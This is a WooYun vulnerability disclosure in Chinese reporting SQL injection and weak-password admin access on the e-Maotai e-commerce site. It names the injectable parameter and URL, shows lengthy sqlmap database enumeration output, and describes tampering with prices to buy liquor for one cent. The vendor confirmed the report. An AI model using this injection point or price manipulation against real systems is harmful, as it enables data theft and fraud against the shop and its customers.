乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-09: 厂商已经确认,细节仅向厂商公开 2015-11-19: 细节向核心白帽子及相关领域专家公开 2015-11-29: 细节向普通白帽子公开 2015-12-09: 细节向实习白帽子公开 2015-12-24: 细节向公众公开
电商安全之e茅台主站sql注入(大量用户信息泄漏/免费购买国酒茅台)
电商安全之e茅台主站sql注入(大量用户信息泄漏/免费购买国酒茅台)茅台主站
http://www.emaotai.cn/
双十一还有活动哈弱口令进入后台
www.emaotai.cn:90/zyd/Member/HyReg.aspx?khbh=20130523000007&op=2&ReturnPage=HyList2.aspx
khbh参数存在注入
库就18个
茅台不愧是国酒 后台数据多的夸张 就不逐一去跑了
[22:04:01] [INFO] fetching database names[22:04:01] [INFO] the SQL query used returns 18 entries[22:04:01] [INFO] resumed: distribution[22:04:01] [INFO] resumed: DrpEco[22:04:01] [INFO] resumed: drpecosdl[22:04:01] [INFO] resumed: DrpEcoTest[22:04:01] [INFO] resumed: eAct[22:04:01] [INFO] resumed: eActTest[22:04:01] [INFO] resumed: emaotai_act[22:04:01] [INFO] resumed: emaotai_act_test[22:04:01] [INFO] resumed: emaotai_logs[22:04:01] [INFO] resumed: hishop[22:04:01] [INFO] resumed: master[22:04:01] [INFO] resumed: model[22:04:01] [INFO] resumed: moutai[22:04:01] [INFO] resumed: moutaitest[22:04:01] [INFO] resumed: msdb[22:04:01] [INFO] resumed: ReportServer[22:04:01] [INFO] resumed: ReportServerTempDB[22:04:01] [INFO] resumed: tempdb[22:04:01] [INFO] fetching tables for databases: DrpEco, DrpEcoTest, ReportServer, ReportServerTempDB, distribution, drpecosdl, eAct, eActTest, emaotai_act, emaotai_act_test, emaotai_logs, hishop, master, model, moutai, moutaitest, msdb, tempdb[22:04:01] [INFO] the SQL query used returns 237 entries[22:04:01] [INFO] the SQL query used returns 39 entries[22:04:01] [INFO] the SQL query used returns 68 entries[22:04:01] [INFO] retrieved: dbo.t_xtgl_rjmkbmb[22:04:02] [INFO] retrieved: dbo.t_xtgl_spjg[22:04:02] [INFO] retrieved: dbo.t_xtgl_spml[22:04:02] [INFO] retrieved: dbo.t_xtgl_xzqh[22:04:02] [INFO] retrieved: dbo.t_xtgl_xzsf[22:04:02] [INFO] the SQL query used returns 27 entries[22:04:02] [INFO] retrieved: dbo.act_info[22:04:02] [INFO] retrieved: dbo.act_photo[22:04:03] [INFO] retrieved: dbo.act_purchase_log[22:04:03] [INFO] retrieved: dbo.act_result[22:04:03] [INFO] retrieved: dbo.act_result_bak_201528[22:04:04] [INFO] retrieved: dbo.act_result_coupon[22:04:04] [INFO] retrieved: dbo.act_rule[22:04:04] [INFO] retrieved: dbo.act_sys_config[22:04:04] [INFO] retrieved: dbo.act_ticket_a[22:04:05] [INFO] retrieved: dbo.act_ticket_b[22:04:05] [INFO] retrieved: dbo.act_ticket_c[22:04:05] [INFO] retrieved: dbo.act_ticket_d[22:04:05] [INFO] retrieved: dbo.act_ticket_e[22:04:06] [INFO] retrieved: dbo.act_ticket_f[22:04:06] [INFO] retrieved: dbo.act_ticket_test[22:04:06] [INFO] retrieved: dbo.act_vote[22:04:06] [INFO] retrieved: dbo.act_vote_detail[22:04:06] [INFO] retrieved: dbo.act_wx_share_log[22:04:06] [INFO] retrieved: dbo.act_wx_userinfo[22:04:07] [INFO] retrieved: dbo.draw_user[22:04:07] [INFO] retrieved: dbo.gift_detail[22:04:07] [INFO] retrieved: dbo.gift_list[22:04:07] [INFO] retrieved: dbo.gift_ticket[22:04:07] [INFO] retrieved: dbo.Log_sms_result[22:04:08] [INFO] retrieved: dbo.t_weixin_act[22:04:11] [INFO] retrieved: dbo.ticket_b[22:04:11] [INFO] the SQL query used returns 142 entries[22:04:11] [INFO] retrieved: dbo.#0024001B[22:04:12] [INFO] retrieved: dbo.#009FF5AC[22:04:12] [INFO] retrieved: dbo.#01182454[22:04:12] [INFO] retrieved: dbo.#020C488D[22:04:13] [INFO] retrieved: dbo.#03006CC6[22:04:13] [INFO] retrieved: dbo.#037C6257[22:04:13] [INFO] retrieved: dbo.#03E80D59[22:04:14] [INFO] retrieved: dbo.#03F490FF[22:04:14] [INFO] retrieved: dbo.#04708690[22:04:14] [INFO] retrieved: dbo.#04E8B538[22:04:14] [INFO] retrieved: dbo.#05DCD971[22:04:14] [INFO] retrieved: dbo.#06D0FDAA[22:04:15] [INFO] retrieved: dbo.#07C521E3[22:04:15] [INFO] retrieved: dbo.#088D923C[22:04:16] [INFO] retrieved: dbo.#08B9461C[22:04:16] [INFO] retrieved: dbo.#098BD816[22:04:16] [INFO] retrieved: dbo.#09AD6A55[22:04:17] [INFO] retrieved: dbo.#0AA18E8E[22:04:17] [INFO] retrieved: dbo.#0B95B2C7[22:04:17] [INFO] retrieved: dbo.#0C89D700[22:04:18] [INFO] retrieved: dbo.#0D05CC91[22:04:18] [INFO] retrieved: dbo.#0D3D38C0[22:04:18] [INFO] retrieved: dbo.#0D7DFB39[22:04:18] [INFO] retrieved: dbo.#0E315CF9[22:04:18] [INFO] retrieved: dbo.#0E721F72[22:04:18] [INFO] retrieved: dbo.#0F6643AB[22:04:19] [INFO] retrieved: dbo.#105A67E4[22:04:19] [INFO] retrieved: dbo.#114E8C1D[22:04:19] [INFO] retrieved: dbo.#1242B056[22:04:28] [INFO] retrieved: dbo.#1336D48F[22:04:28] [INFO] retrieved: dbo.#142AF8C8[22:04:29] [INFO] retrieved: dbo.#1432B864[22:04:29] [INFO] retrieved: dbo.#14A6EE59[22:04:29] [INFO] retrieved: dbo.#151F1D01[22:04:29] [INFO] retrieved: dbo.#1526DC9D[22:04:29] [INFO] retrieved: dbo.#15660868[22:04:29] [INFO] retrieved: dbo.#15B1B7D9[22:04:30] [INFO] retrieved: dbo.#1613413A[22:04:30] [INFO] retrieved: dbo.#17076573[22:04:30] [INFO] retrieved: dbo.#17FB89AC[22:04:30] [INFO] retrieved: dbo.#18EFADE5[22:04:31] [INFO] retrieved: dbo.#1936994C[22:04:31] [INFO] retrieved: dbo.#19E3D21E[22:04:31] [INFO] retrieved: dbo.#1A422E23[22:04:31] [INFO] retrieved: dbo.#1A5FC7AF[22:04:34] [INFO] retrieved: dbo.#1AD7F657[22:04:35] [INFO] retrieved: dbo.#1B1EE1BE[22:04:35] [INFO] retrieved: dbo.#1B36525C[22:04:35] [INFO] retrieved: dbo.#1BCC1A90[22:04:35] [INFO] retrieved: dbo.#1CC03EC9[22:04:35] [INFO] retrieved: dbo.#1DB46302[22:04:36] [INFO] retrieved: dbo.#1EA8873B[22:04:36] [INFO] retrieved: dbo.#1F9CAB74[22:04:36] [INFO] retrieved: dbo.#1FEE83D3[22:04:37] [INFO] retrieved: dbo.#2090CFAD[22:04:37] [INFO] retrieved: dbo.#20D7BB14[22:04:37] [INFO] retrieved: dbo.#24A9E2A6[22:04:37] [INFO] retrieved: dbo.#2EF0D041[22:04:37] [INFO] retrieved: dbo.#2F9E0913[22:04:37] [INFO] retrieved: dbo.#30922D4C[22:04:38] [INFO] retrieved: dbo.#383CA55E[22:04:38] [INFO] retrieved: dbo.#396E5EB4[22:04:38] [INFO] retrieved: dbo.#3A6282ED[22:04:39] [INFO] retrieved: dbo.#3B56A726[22:04:39] [INFO] retrieved: dbo.#3C0D3642[22:04:48] [INFO] retrieved: dbo.#3C7FD589[22:04:48] [INFO] retrieved: dbo.#3FDDC726[22:04:48] [INFO] retrieved: dbo.#4067D70B[22:04:49] [INFO] retrieved: dbo.#47D4BA00[22:04:49] [INFO] retrieved: dbo.#47DFA6F8[22:04:50] [INFO] retrieved: dbo.#483ECE54[22:04:50] [INFO] retrieved: dbo.#48D3CB31[22:04:50] [INFO] retrieved: dbo.#49BAA06D[22:04:50] [INFO] retrieved: dbo.#49C7EF6A[22:04:50] [INFO] retrieved: dbo.#4ABC13A3[22:04:51] [INFO] retrieved: dbo.#4AE5657E[22:04:51] [INFO] retrieved: dbo.#4C0F5F38[22:04:51] [INFO] retrieved: dbo.#4CA45C15[22:04:51] [INFO] retrieved: dbo.#4D98804E^C[22:04:51] [WARNING] user aborted during enumeration. sqlmap will display partial output[22:04:51] [INFO] the SQL query used returns 229 entries[22:04:52] [INFO] retrieved: dbo.backupfile[22:04:52] [INFO] retrieved: dbo.backupfilegroup[22:04:52] [INFO] retrieved: dbo.backupmediafamily[22:04:52] [INFO] retrieved: dbo.backupmediaset[22:04:52] [INFO] retrieved: dbo.backupset[22:04:53] [INFO] retrieved: dbo.log_shipping_monitor_alert[22:04:53] [INFO] retrieved: dbo.log_shipping_monitor_error_detail[22:04:53] [INFO] retrieved: dbo.log_shipping_monitor_history_detail[22:04:53] [INFO] retrieved: dbo.log_shipping_monitor_primary[22:04:54] [INFO] retrieved: dbo.log_shipping_monitor_secondary[22:04:54] [INFO] retrieved: dbo.log_shipping_primaries[22:04:54] [INFO] retrieved: dbo.log_shipping_primary_databases[22:04:54] [INFO] retrieved: dbo.log_shipping_primary_secondaries[22:04:55] [INFO] retrieved: dbo.log_shipping_secondaries[22:04:55] [INFO] retrieved: dbo.log_shipping_secondary^C[22:04:55] [WARNING] user aborted during enumeration. sqlmap will display partial output[22:04:55] [INFO] the SQL query used returns 224 entries[22:04:55] [INFO] retrieved: dbo.dtproperties^C[22:04:56] [WARNING] user aborted during enumeration. sqlmap will display partial output[22:04:56] [INFO] the SQL query used returns 573 entries[22:04:56] [INFO] retrieved: dbo.atest^C[22:04:57] [WARNING] user aborted during enumeration. sqlmap will display partial output[22:04:57] [INFO] the SQL query used returns 13 entries[22:04:57] [INFO] resumed: dbo.ChunkData[22:04:57] [INFO] retrieved: dbo.ChunkSegmentMapping[22:04:57] [INFO] retrieved: dbo.DBUpgradeHistory^C[22:04:57] [WARNING] user aborted during enumeration. sqlmap will display partial output[22:04:58] [INFO] the SQL query used returns 199 entries[22:04:58] [INFO] retrieved: dbo.aspnet_MemberGrades^C[22:04:58] [WARNING] user aborted during enumeration. sqlmap will display partial output[22:04:58] [INFO] the SQL query used returns 364 entries
然后重点来了 可随意修改价格 然后下单 免费购买国酒茅台
买完之后 我自己就可以审核通过订单了
就这样几千块的茅台 一分钱就能拿到了 我就不下单了 赶快修复吧还有泄露了大量的客户信息
已证明
危害等级:高
漏洞Rank:15
确认时间:2015-11-09 09:45
感谢路人甲的反馈
暂无